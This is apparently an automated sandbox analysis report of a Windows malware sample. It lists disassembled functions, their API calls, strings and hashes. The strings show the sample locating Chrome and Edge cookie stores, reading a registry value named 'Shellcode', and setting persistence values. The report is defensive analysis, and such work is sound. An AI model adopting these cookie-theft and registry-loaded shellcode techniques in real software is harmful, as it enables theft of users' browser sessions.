                                                                                                                                                                • Opcode Fuzzy Hash: c7eb9be680bd7b15f16886ce5a7bdb02d63966e1d1e01109bbf4a03544f02e95
                                                                                                                                                                • Instruction Fuzzy Hash: 30029F7454D384CFD364CF28C194B8EBFE1AF8A308F20895EE9988B395D775A485CB46
                                                                                                                                                                Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                Function 00070824 Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000702C4: SetLastError.KERNEL32(0000000D,00070843,00000000,00000000,00079949), ref: 000702CA
                                                                                                                                                                • SetLastError.KERNEL32(000000C1,00000000,00000000,00079949), ref: 0007085A
                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,00000000,00000000,00079949), ref: 000708CD
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00070939
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00070940
                                                                                                                                                                • SetLastError.KERNEL32(0000045A), ref: 00070A52
                                                                                                                                                                  • Part of subcall function 000707D7: VirtualFree.KERNEL32(00008000,00000000,00000000,?,00070959,00000000,00000000,00008000,00000000), ref: 000707E3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 486403682-0
                                                                                                                                                                • Opcode ID: a2ff9ba0426b905b03fb3d760af9291ca9d4548826eb5e90d285f4e79ce873b7
                                                                                                                                                                • Instruction ID: 601cff78b8bbf158cfd5993fc0b07d004b951cba52d41da74004999094126541
                                                                                                                                                                • Opcode Fuzzy Hash: a2ff9ba0426b905b03fb3d760af9291ca9d4548826eb5e90d285f4e79ce873b7
                                                                                                                                                                • Instruction Fuzzy Hash: 1B61D171E01601EBEB609F65CD81B6AB7E5BF44300F048358E90C9B682EB7CE951CBD9
                                                                                                                                                                Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2152742572-0
                                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                Function 000A3958 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000001,AC02BBF3,-00000004,0009A897,000A1E3B,AC02BBF3,?,000A0866,00000001,00000001), ref: 000A395D
                                                                                                                                                                • _free.LIBCMT ref: 000A3992
                                                                                                                                                                • _free.LIBCMT ref: 000A39B9
                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000001), ref: 000A39C6
                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000001), ref: 000A39CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                • Opcode ID: 3ab62e57c696e6e3df802bbe913f25d93014dd19095d9bcb60eced744ae5845d
                                                                                                                                                                • Instruction ID: c052254c3484bff4beb7ccd1ae3aa7434824e6f42c99bb6bb0b6446ef6af04d5
                                                                                                                                                                • Opcode Fuzzy Hash: 3ab62e57c696e6e3df802bbe913f25d93014dd19095d9bcb60eced744ae5845d
                                                                                                                                                                • Instruction Fuzzy Hash: 8401CD761007017FE61267F59C45EEF266AEFD33B17240239F919A3192EFB98E058161
                                                                                                                                                                Function 00073E2A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountEventTick
                                                                                                                                                                • String ID: h%$h%
                                                                                                                                                                • API String ID: 180926312-1964147555
                                                                                                                                                                • Opcode ID: ba79fde0366f3adf76dfd9c507c79ffdbfcccd2f5856936dd58d93339167f927
                                                                                                                                                                • Instruction ID: 76eb6391a4d16298f607da76a7d6fd60a5673738f842a01ed93cf35f9133b8fd
                                                                                                                                                                • Opcode Fuzzy Hash: ba79fde0366f3adf76dfd9c507c79ffdbfcccd2f5856936dd58d93339167f927
                                                                                                                                                                • Instruction Fuzzy Hash: BC5181316086405AD724FB20DC92BEF73A6AF91300F50452DB58A971E3EF745A09C7A6
                                                                                                                                                                Function 0006C22E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C105: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0006C245), ref: 0006C138
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0006C25F
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0006C2CA
                                                                                                                                                                Strings
                                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0006C277
                                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0006C245
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                • API String ID: 521105947-1980882731
                                                                                                                                                                • Opcode ID: d8f7efefa1cbc041fb6f62446060c8e55d032f0f3b1694c21edc67c96235210a
                                                                                                                                                                • Instruction ID: eac4dd6453d22c4d60bfcc726a24f3c786148038ea9f2b6e3a13ea2cbbcf0240
                                                                                                                                                                • Opcode Fuzzy Hash: d8f7efefa1cbc041fb6f62446060c8e55d032f0f3b1694c21edc67c96235210a
                                                                                                                                                                • Instruction Fuzzy Hash: 7021E5719101195ADB08FBE5DC56CFEBB7AEF50710B444129F542A3093EF74AA8AC6D0
                                                                                                                                                                Function 0006C2FD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0006C168: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,0006C314), ref: 0006C19B
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0006C32E
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0006C399
                                                                                                                                                                Strings
                                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0006C346
                                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0006C314
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath$char_traits
                                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                • API String ID: 521105947-1980882731
                                                                                                                                                                • Opcode ID: 652aa5e3a49feaf3aed97e5620816fc85ca330d1932ac095559047ad2eadc481
                                                                                                                                                                • Instruction ID: 0419fb2ee2d708192c656be78df4db14fec05a8a831a044aaec7afdbc0f11c3c
                                                                                                                                                                • Opcode Fuzzy Hash: 652aa5e3a49feaf3aed97e5620816fc85ca330d1932ac095559047ad2eadc481
                                                                                                                                                                • Instruction Fuzzy Hash: 6A2100719101195ADB08FBE5DC56CFEBB7AEF50710B484129F542A3193EF70AA8AC6D0
                                                                                                                                                                Function 0006506B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocalTime.KERNEL32(00000000,000D2318,000D2568,?,?,?,0007355B,0000003C,00000000,00000000), ref: 0006509B
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,000D2318,000D2568,?,?,?,0007355B,0000003C,00000000,00000000), ref: 000650E7
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,000D2568,00000000,00000000), ref: 000650FA
                                                                                                                                                                Strings
                                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 000650AE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                • API String ID: 2532271599-1507639952
                                                                                                                                                                • Opcode ID: e36e0e5832f1e1e94778cad95f7d1bd27c7f53c0480a431ff02d7cab41c90038
                                                                                                                                                                • Instruction ID: 31ecf2b3b2a6187f8c64884dd83a6dc3344d4d8fd68f03749ca7acf790d6bd28
                                                                                                                                                                • Opcode Fuzzy Hash: e36e0e5832f1e1e94778cad95f7d1bd27c7f53c0480a431ff02d7cab41c90038
                                                                                                                                                                • Instruction Fuzzy Hash: EB112931904A846BE720AB7A8C0DFDB7FFA9BD3711F04011DF84246152DAB99444C7B2
                                                                                                                                                                Function 00071976 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,000D2318,00000000,Shellcode), ref: 0007199A
                                                                                                                                                                • RegQueryValueExA.KERNEL32(000D2318,00000000,00000000,00000000,?,00000400), ref: 000719B7
                                                                                                                                                                • RegCloseKey.KERNEL32(000D2318), ref: 000719C2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID: Shellcode
                                                                                                                                                                • API String ID: 3677997916-49482680
                                                                                                                                                                • Opcode ID: 6ab58001d8b6107d43b0af0c464b1aa45404b9ef54550aba8abf64017e887adf
                                                                                                                                                                • Instruction ID: 1d62e49c0a4aa91ad074f7c615bf6b5f58b18fae786b88553ad8948f708fe024
                                                                                                                                                                • Opcode Fuzzy Hash: 6ab58001d8b6107d43b0af0c464b1aa45404b9ef54550aba8abf64017e887adf
                                                                                                                                                                • Instruction Fuzzy Hash: F501D676A00118BBDB209B96DC48DEF7FBDDB44750F004156BB49A2140DA398E159BB0
                                                                                                                                                                Function 00071B45 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00071B54
                                                                                                                                                                • RegSetValueExA.KERNEL32(?,000C34D0,00000000,?,00000000,00000000,000D22B8,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B7C
                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?,0006E3B0,000C34D0,4.9.4 Pro), ref: 00071B87
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                • String ID: pth_unenc
                                                                                                                                                                • API String ID: 1818849710-4028850238
                                                                                                                                                                • Opcode ID: 0c2c886e45fe309ed39b227e5e8ca16cca4e66a969d5ba7d0861c6864e66518d
                                                                                                                                                                • Instruction ID: 1c29d3e6c1e5d895b42040d68bd74b8b3673398e61e05a2e5b3c1d78322dddb2
                                                                                                                                                                • Opcode Fuzzy Hash: 0c2c886e45fe309ed39b227e5e8ca16cca4e66a969d5ba7d0861c6864e66518d
                                                                                                                                                                • Instruction Fuzzy Hash: FAF09072540108FBEB10AFA1DC45EEF3B7DEF04750F108255FE09A6151EB3A9E14EAA0
                                                                                                                                                                Function 00071C4D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,0006E237), ref: 00071C5B
                                                                                                                                                                • RegSetValueExA.KERNEL32(0006E237,?,00000000,00000004,?,00000004,time,?,?,0006CE78,time,?,000D22B8,000D2318,del,del), ref: 00071C76
                                                                                                                                                                • RegCloseKey.KERNEL32(0006E237,?,?,0006CE78,time,?,000D22B8,000D2318,del,del,?,0006E237), ref: 00071C81
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateValue
                                                                                                                                                                • String ID: time
                                                                                                                                                                • API String ID: 1818849710-1872009285
                                                                                                                                                                • Opcode ID: 0e43b336bddc8ea9d48f11e969ae52b92f582480f62e7a5d42895b46a269feba
                                                                                                                                                                • Instruction ID: d1762f5095c4c7d0c5f65f32f217937e0ef57b93f48efb448da71731bef1bd65
                                                                                                                                                                • Opcode Fuzzy Hash: 0e43b336bddc8ea9d48f11e969ae52b92f582480f62e7a5d42895b46a269feba
                                                                                                                                                                • Instruction Fuzzy Hash: 77E03072950208BBEB219F919D05FEA7B6CDB04750F104254BB0896150D63A9E14A794
                                                                                                                                                                Function 00064DEB Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,000D1F30), ref: 00064ED8
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,000D1ED8,00000000,00000000), ref: 00064EEB
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00064DBE,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00064EF6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00064DBE,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00064EFF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3360349984-0
                                                                                                                                                                • Opcode ID: b0fa81d671d2da28f8955fb511df37cc0df8108de45a01672fe98777f614da26
                                                                                                                                                                • Instruction ID: 42434d0b98e1c5a50588d900b90519c914a9e2a67d94f978192013b782ec9d2e
                                                                                                                                                                • Opcode Fuzzy Hash: b0fa81d671d2da28f8955fb511df37cc0df8108de45a01672fe98777f614da26
                                                                                                                                                                • Instruction Fuzzy Hash: 1D416471A00519ABEF15EBA4CC55EFEB7BEAF54320F040119F852A3292DF755905C7A0
                                                                                                                                                                Function 6FE7D840 Relevance: 6.1, APIs: 4, Instructions: 61synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FE7D873
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 6FE7D87F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7D896
                                                                                                                                                                • CloseHandle.KERNEL32(6FE80A90), ref: 6FE7D906
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
